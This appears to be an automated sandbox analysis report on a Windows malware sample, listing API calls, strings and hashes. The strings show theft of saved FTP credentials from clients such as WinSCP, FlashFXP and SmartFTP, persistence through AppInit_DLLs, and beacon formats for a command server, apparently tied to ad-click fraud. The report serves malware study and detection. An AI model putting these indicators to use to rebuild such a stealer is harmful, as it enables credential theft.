                  • String ID: .html$From: $Via: $^client=$^key=$file$none
                  • API String ID: 2247176544-3749385445
                  • Opcode ID: 6a9d8a2b960fb8ecbd71def97b915302dd31e261924da3fa70170851c5f8d9bc
                  • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                  • Opcode Fuzzy Hash: 6a9d8a2b960fb8ecbd71def97b915302dd31e261924da3fa70170851c5f8d9bc
                  • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00000C0C), ref: 004041FD
                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                  • RegCloseKey.ADVAPI32(?), ref: 0040442A
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: HeapOpen$AllocateCloseEnumFree
                  • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                  • API String ID: 755471147-4007225339
                  • Opcode ID: f29ce97687ee8e0874f7ebd76575de33d86bd70d41b4c66ff4b04de971eb53c9
                  • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                  • Opcode Fuzzy Hash: f29ce97687ee8e0874f7ebd76575de33d86bd70d41b4c66ff4b04de971eb53c9
                  • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00000C20,?), ref: 00404542
                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                  • RegCloseKey.ADVAPI32(?), ref: 0040476D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: AllocateCloseEnumHeapOpen
                  • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                  • API String ID: 3847610418-285550827
                  • Opcode ID: 1d9827a894f3f8a5ead85e530c3a22f3f32bf575e3091ef13a728acf1b8ae2ad
                  • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                  • Opcode Fuzzy Hash: 1d9827a894f3f8a5ead85e530c3a22f3f32bf575e3091ef13a728acf1b8ae2ad
                  • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                  APIs
                  • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                  • SysFreeString.OLEAUT32(?), ref: 00409359
                  • SysFreeString.OLEAUT32(?), ref: 00409362
                  • SysAllocString.OLEAUT32(?), ref: 004093B8
                  • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: String$Free$Alloc$CharLower
                  • String ID: http:$javascript$+@
                  • API String ID: 1987340527-3375436608
                  • Opcode ID: 5d27cd9a03f957513de167056b4cf6ac27d5de90ad2759fc38c181f1cdf52fe6
                  • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                  • Opcode Fuzzy Hash: 5d27cd9a03f957513de167056b4cf6ac27d5de90ad2759fc38c181f1cdf52fe6
                  • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                  APIs
                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000), ref: 0040823C
                  • RtlAllocateHeap.NTDLL(00000008,00000626), ref: 00404888
                  • StrStrIA.SHLWAPI(?,?), ref: 00404913
                  • StrStrIA.SHLWAPI(?,?), ref: 00404925
                  • StrStrIA.SHLWAPI(?,?), ref: 00404935
                  • StrStrIA.SHLWAPI(?,?), ref: 00404947
                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?), ref: 00408280
                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: Find$FilePath$AllocateCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                  • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                  • API String ID: 2372625535-1322549247
                  • Opcode ID: 40d46e4d36d3a186cbd1342ff77bf9c5cf66d7f17174447c238647f62506998a
                  • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                  • Opcode Fuzzy Hash: 40d46e4d36d3a186cbd1342ff77bf9c5cf66d7f17174447c238647f62506998a
                  • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: Sleep
                  • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                  • API String ID: 3472027048-2333287219
                  • Opcode ID: 3cd90bfa2c2e623c21955266312847ad0ab3481047343eeed66e671b36a79e18
                  • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                  • Opcode Fuzzy Hash: 3cd90bfa2c2e623c21955266312847ad0ab3481047343eeed66e671b36a79e18
                  • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                  APIs
                  • InternetOpenUrlW.WININET(?,?,?,00000000,04400000,00000000), ref: 00409CCB
                  • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409CF4
                  • RtlAllocateHeap.NTDLL(00000000,?,00406FE2), ref: 00409CF7
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409D6E
                  • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409D80
                  • RtlAllocateHeap.NTDLL(00000000,?,00406FE2), ref: 00409D83
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409DE3
                  • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409DE6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: Heap$Process$AllocateInternet$FileFreeOpenRead
                  • String ID:
                  • API String ID: 1606433043-0
                  • Opcode ID: ee70a092113cb82a66864aea72d7e922ec5dd955c6bc6ddcba87379bbd99d211
                  • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                  • Opcode Fuzzy Hash: ee70a092113cb82a66864aea72d7e922ec5dd955c6bc6ddcba87379bbd99d211
                  • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                  APIs
                  • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: ClearVariant
                  • String ID: _self$http$+@
                  • API String ID: 1473721057-3317424838
                  • Opcode ID: ab4bd90ea66eddbce87e6e8c3e150a25643718a252917f3ed87c424215e5f652
                  • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                  • Opcode Fuzzy Hash: ab4bd90ea66eddbce87e6e8c3e150a25643718a252917f3ed87c424215e5f652
                  • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,?,?,?,004032CE), ref: 00406B2A
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,?,?,?,004032CE), ref: 00406B8C
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                  • API String ID: 3546245721-1332223170
                  • Opcode ID: 52edaa5a59db4a54e65230104dd567da198e5767e6115127b3a1ab9bfcca5398
                  • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                  • Opcode Fuzzy Hash: 52edaa5a59db4a54e65230104dd567da198e5767e6115127b3a1ab9bfcca5398
                  • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: CountTick
                  • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt
                  APIs
                  • Sleep.KERNEL32(00002710,?,00000000), ref: 0040A7A3
                  • Sleep.KERNEL32(0000EA60,?,?,00000000), ref: 0040A899
                  • Sleep.KERNEL32(00002710,?,?,?,?,?,?,00000000), ref: 0040A8CC
                  • GetProcessHeap.KERNEL32(00000000,Iy@,?,?,?,?,?,?,00000000), ref: 0040A8E5
                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0040A8EC
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  Strings
                  Similarity
                  • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                  • String ID: 0$Iy@$Iy@$confirm^rev=%s^code=%s^param=%s^os=%s
                  APIs
                  • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                  • GetLocalTime.KERNEL32(?), ref: 00407387
                  • GetLocalTime.KERNEL32(?), ref: 0040738D
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                  • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                  Similarity
                  • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                  • String ID:
                  Strings
                  Similarity
                  • API ID:
                  • String ID: http$+@
                  APIs
                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                  Strings
                  Similarity
                  • API ID: EnvironmentExpandFolderOpenPathStrings
                  • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004099EB
                  • SysAllocString.OLEAUT32(?), ref: 004099F9
                  Strings
                  Similarity
                  • API ID: AllocString
                  • String ID: </domain>$</url>$<domain>$<url>$http://
                  APIs
                  • SysFreeString.OLEAUT32(753CF6A0), ref: 00408F82
                  • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710), ref: 0040ACAE
                  • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                  • Sleep.KERNEL32(00002710), ref: 0040ADA4
                  Strings
                  Similarity
                  • API ID: Sleep$AttemptConnectInternet
                  • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                  APIs
                  • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                  • __FindPESection.LIBCMT ref: 0040D8AC
                  Similarity
                  • API ID: FindHandlersScopeSectionTableValidate
                  • String ID:
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004088E4
                  • SysFreeString.OLEAUT32(?), ref: 004088E9
                  • SysFreeString.OLEAUT32(?), ref: 004089D3
                  • SysFreeString.OLEAUT32(?), ref: 004089D8
                  • SysFreeString.OLEAUT32(?), ref: 004089F3
                  Strings
                  Similarity
                  • API ID: FreeString
                  • String ID: +@
                  APIs
                  • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                  • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                  • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                    • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                    • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                    • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Similarity
                  • API ID: Window$AllocCreateFindHandleInitializeModuleParentString
                  • String ID: Shell_TrayWnd$eventConn
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094E6
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  APIs
                  • _memset.LIBCMT ref: 0040A26B
                  • SysAllocString.OLEAUT32(?), ref: 0040A28E
                  • SysAllocString.OLEAUT32(?), ref: 0040A296
                  • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                  • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                    • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                    • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                    • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                  Strings
                  Similarity
                  • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                  • String ID: J(@
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,?,UniqueNum), ref: 0040784D
                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                  • CloseHandle.KERNEL32(00000000), ref: 00407880
                  • GetTickCount.KERNEL32 ref: 00407888
                  Strings
                  Similarity
                  • API ID: File$CloseCountCreateHandleModuleNameTickTime
                  • String ID: UniqueNum
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?), ref: 00408628
                  • GetLastError.KERNEL32 ref: 0040864A
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll), ref: 00408687
                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                  Strings
                  Similarity
                  • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                  • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409B00
                  • SysAllocString.OLEAUT32(?), ref: 00409B0E
                  Strings
                  Similarity
                  • API ID: AllocString
                  • String ID: </title>$</url>$<title>$<url>
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710,?,?,00000000,?,004027BD,?,00000001,00000000,?,?), ref: 0040A91C
                  • Sleep.KERNEL32(00002710), ref: 0040AAC1
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AAE9
                  • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                  Strings
                  • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                  • 0, xrefs: 0040AA5B
                  Similarity
                  • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                  • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                  • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                  • CloseHandle.KERNEL32(?), ref: 00408452
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 1974014688-0
                  APIs
                  • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                  • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                  • String ID: POST
                  • API String ID: 961146071-1814004025
                  APIs
                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                  Strings
                  • personal favorites, xrefs: 00405176
                  • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                  • folder, xrefs: 00405184
                  • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: EnvironmentExpandOpenStrings
                  • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                  • API String ID: 3923277744-821743658
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 0040A0C0
                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                  • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: CreateHandleInitializeModuleWindow
                  • String ID: AtlAxWin$Shell.Explorer
                  • API String ID: 950422046-1300462704
                  APIs
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                  • ReadFile.KERNEL32(?,00000064,00000000,00000000), ref: 00407E74
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: File$CreateModuleNamePointerRead
                  • String ID: UniqueNum$d$x
                  • API String ID: 1528952607-727609663
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                  • CharLowerW.USER32(?), ref: 0040ABA0
                  • GetCommandLineW.KERNEL32 ref: 0040ABC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: CharCommandFileLineLowerModuleName
                  • String ID: /updatefile3$netprotdrvss.exe
                  • API String ID: 3118597399-3449771660
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409FCE
                  • GetTickCount.KERNEL32 ref: 00409FDE
                  • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                  • DispatchMessageW.USER32(?), ref: 0040A009
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409F5B
                  • GetTickCount.KERNEL32 ref: 00409F5F
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                  • DispatchMessageW.USER32(?), ref: 00409F80
                  • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  APIs
                    • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                    • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                    • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                    • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                    • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                    • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
